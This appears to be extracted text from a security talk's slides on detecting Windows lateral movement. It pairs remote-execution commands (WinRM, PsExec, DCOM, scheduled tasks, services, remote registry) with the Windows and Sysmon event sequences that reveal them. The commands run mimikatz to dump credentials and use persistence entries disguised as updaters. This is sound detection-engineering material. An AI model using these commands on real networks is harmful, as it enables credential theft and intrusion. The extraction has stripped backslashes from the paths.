2. Who Am I
• Senior SOC Analyst @Kaspersky Lab
• SibSAU (Krasnoyarsk) graduate
• Ex- Infosec dept. head
• Ex- Infosec admin
• Ex- System admin
• Twitter @HeirhabarovT
• www.linkedin.com/in/teymur-kheirkhabarov-73490867/
3. What we’re going to talk about
• Different ways to launch executables remotely by using
compromised credentials and operating system
functionality;
• How to detect remotely launched executables with
Windows Event and Sysmon logs.
4. Remote file copy over SMB
• Copy to autostart locations for execution on login or boot
• Copy to different locations for further execution via WMI,
WinRM, Powershell Remoting, Task Scheduler, Service…
• Programmatically
• Using Explorer
• Using standard console tools:
• robocopy C:tools pc0002ADMIN$userspublic mimikatz.exe
• powershell Copy-Item -Path mimikatz.exe -Destination pc0002C$userspublic
• cmd /c "copy mimikatz.exe pc0002C$userspublic"
• xcopy mimikatz.exe pc0002C$ProgramDataMicrosoftWindowsStart
MenuProgramsStartup
How
• TCP/455 port is accessible on remote host
• Administrative shares are enabled on remote host
Requirements & limitations
5. Remote File Copy over SMB – events
sequence on destination side
E2. Special privileges
assigned to new
logon (Windows EID
4672)
E1. Network Logon
(Windows EID 4624)
E3. Administrative
share access
(Windows EID
5140/5145)
E4. File object access
with WriteData or
AddFile rights (Windows
EID 4663) – if audit and
SACL were configured
13. Remote execution via WinRM
• Programmatically
• Using Windows Remote Shell (WinRS) tool:
• winrs -r:pc0002.test.local C:UsersPublicmimikatz.exe privilege::debug
sekurlsa::logonpasswords exit
• winrs -r:pc0002.test.local -u:dadmin C:UsersPublicmimikatz.exe
privilege::debug sekurlsa::logonpasswords exit
How
• WinRM is enabled on remote host (disabled by default on
client Windows versions)
• TCP/5985 (TCP/5986) port is accessible on remote host
Requirements & limitations
14. Remote execution via WinRM – events
sequence on destination side
E2. Special privileges
assigned to new
logon (Windows EID
4672)
E1. Network Logon
(Windows EID 4624)
E3. svchost.exe
starts WinrsHost.exe
(Sysmon EID 1)
E4. WinrsHost.exe
starts payload file
(Sysmon EID 1)
19. Remote execution via MMC20.Application
COM
How
• Programmatically
• Using powershell:
powershell -command
"&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Appli
cation','pc0002.test.local'));
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c
C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >>
C:UsersPublicpc0002_mimikatz_output.txt','7')}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
20. E2. Special privileges
assigned to new
logon (Windows EID
4672)
E1. Network Logon
(Windows EID 4624)
E3. svchost.exe
starts mmc.exe
(Sysmon EID 1)
E4. mmc.exe starts
payload file (Sysmon
EID 1)
Remote execution via MMC20.Application
COM – events sequence on destination side
22. Remote execution via PsExec (& clones, e.g.
PaExec)
• PsExex:
• psexec.exe pc0002 -c mimikatz.exe privilege::debug
sekurlsa::logonpasswords exit
• PaExec:
• paexec.exe pc0002 -c mimikatz.exe privilege::debug
sekurlsa::logonpasswords exit
How
• ADMIN$ administrative share is enabled on remote host
• TCP/445 port is accessible on remote host
Requirements & limitations
23. E2. Special privileges
assigned to new
logon (Windows EID
4672)
E1. Network Logon
(Windows EID 4624)
E3. Copying
PSEXESVC.exe to
ADMIN$ (Windows
EID 5140/5145)
E4. psexesvc service
is installed and
started (Windows
EID 7045/7036)
Remote execution via PsExec (& clones) –
events sequence on destination side
E5. psexesvc.exe is
started by
services.exe
(Sysmon EID 1)
E6. psexesvc.exe
starts payload file
(Sysmon EID 1)
E7. Interaction with
payload
stdin/stdout/stderr
via SMB pipes
(Windows EID 5145)
28. Hunting: search for executions in network
logon sessions (WinRM, WMI, PsExec,
Powershell Remoting, MMC20 COM)
29. Remote execution via ShellWindows COM
How
• Programmatically
• Using powershell:
powershell -command "&{$obj =
[activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-
A442-00A0C90A8F39','pc0002'));
$obj.item().Document.Application.ShellExecute('cmd.exe','/c
calc.exe','C:WindowsSystem32',$null,0)}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
30. Remote execution via
ShellBrowserWindow COM
How
• Programmatically
• Using powershell:
powershell -command "&{$obj =
[activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-
8455-00A0C91F3880','pc0002'));
$obj.Document.Application.ShellExecute('cmd.exe','/c
calc.exe','C:WindowsSystem32',$null,0)}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
• Doesn’t work for Windows 7 destination
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
31. E2. Special privileges
assigned to new
logon (Windows EID
4672)
E1. Network Logon
(Windows EID 4624)
Remote execution via ShellWindows or
ShellBrowserWindow COM – events sequence
on destination side
E3. explorer.exe
starts payload file in
current session
(Sysmon EID 1)
32. Remote execution via via ShellWindows
or ShellBrowserWindow COM – how to
detect???
Payload file is executed in the
session of the current active
user
33. Remote execution via Scheduled Tasks
• Programmatically
• Standard command line tools:
• at 172.16.205.14 3:55 C:UsersPublicmimikatz.exe privilege::debug
sekurlsa::logonpasswords exit >> win_mimikatz_output.txt
• schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR
"cmd.exe /c C:userspublicmimikatz.exe privilege::debug
sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt"
How
• TCP/135 port and RPC dynamic port range are accessible
on remote host (in case of Schtasks usage)
• TCP/445 port is accessible on remote host (in case of AT
usage)
Requirements & limitations
34. Remote execution via Scheduled Tasks –
events sequence on destination side
E2. Special privileges
assigned to new
logon (Windows EID
4672)
E1. Network Logon
(Windows EID 4624)
E3. Access to atsvc
SMB Pipe (Windows
EID 5145) – in case
of at.exe usage
E6. taskeng.exe
starts payload file
(Sysmon EID 1)
E4. Scheduled task is
created or updated
(Windows EID
4698/4702)
E5. Task is triggered.
svchost.exe starts
taskeng.exe (Sysmon
EID 1)
Also there are some interesting event in Microsoft-Windows-TaskScheduler/Operational
event log
39. Remote execution via Services
• Programmatically
• Standard command line tool:
• sc pc0002 create "Remote service" binPath= "cmd /c
C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit
>> C:UsersPublicresult.txt"
sc pc0002 start "Remote service"
sc pc0002 delete »Remote service"
How
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
Requirements & limitations
40. Remote execution via Services – events
sequence on destination side
E2. Special privileges
assigned to new
logon (Windows EID
4672)
E1. Network Logon
(Windows EID 4624)
E3. New service is
installed (Windows
EID 7045/4697)
E4. Start command is
sent to installed
service. services.exe
starts payload file
(Sysmon EID 1)
E5. A timeout is
reached (Windows
EID 7009)
E6. Failure while
trying to start
service (Windows
EID 7000)
43. Remote registry
How
• Programmatically
• Using powershell or reg:
• reg add
pc0002HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v
GoogleUpdater /t REG_SZ /d "cmd /c C:UsersPublicmimikatz.exe
privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt"
• powershell -command
"&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey("LocalMachin
e", "pc0002");
$key=$reg.OpenSubKey("SOFTWAREMicrosoftWindowsCurrentVersionRu
n",$True); $key.SetValue("GoogleUpdater","calc.exe");}"
Requirements & limitations
• TCP/445 port is accessible on remote host
• Remote Registry service is enabled on remote host
44. Remote registry – events sequence on
destination side
E2. Special privileges
assigned to new
logon (Windows EID
4672)
E1. Network Logon
(Windows EID 4624)
E3. WINREG pipe
access (Windows EID
5145)
E4. Registry value is
modified (Windows EID
4657) – if audit and
SACL were configured
50. Remote WMI subscriptions creation –
events sequence on destination side
E2. Special privileges
assigned to new
logon (Windows EID
4672)
E1. Network Logon
(Windows EID 4624)
E3. Writing to WMI
Namespace (Windows
EID 4662) – if audit and
SACL were configured